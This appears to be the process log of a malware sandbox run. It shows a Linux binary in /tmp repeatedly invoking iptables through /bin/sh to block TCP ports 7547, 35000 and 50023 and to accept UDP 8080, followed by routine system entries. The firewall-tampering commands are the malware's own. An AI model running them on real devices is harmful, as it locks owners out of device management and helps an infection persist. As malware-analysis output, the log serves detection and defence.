                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p udp --dport 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:52
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:25:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/upstart
                                                                                                                                Arguments:n/a
                                                                                                                                File size:0 bytes
                                                                                                                                MD5 hash:00000000000000000000000000000000

                                                                                                                                General

                                                                                                                                Start time:20:25:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/date
                                                                                                                                Arguments:date
                                                                                                                                File size:68464 bytes
                                                                                                                                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                                General

                                                                                                                                Start time:20:25:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/share/apport/apport-checkreports
                                                                                                                                Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                                                File size:1269 bytes
                                                                                                                                MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/upstart
                                                                                                                                Arguments:n/a
                                                                                                                                File size:0 bytes
                                                                                                                                MD5 hash:00000000000000000000000000000000

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/date
                                                                                                                                Arguments:date
                                                                                                                                File size:68464 bytes
                                                                                                                                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/share/apport/apport-gtk
                                                                                                                                Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                                File size:23806 bytes
                                                                                                                                MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/upstart
                                                                                                                                Arguments:n/a
                                                                                                                                File size:0 bytes
                                                                                                                                MD5 hash:00000000000000000000000000000000

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/date
                                                                                                                                Arguments:date
                                                                                                                                File size:68464 bytes
                                                                                                                                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:25:49
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/share/apport/apport-gtk
                                                                                                                                Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                                File size:23806 bytes
                                                                                                                                MD5 hash:ec58a49a30ef6a29406a204f28cc7d87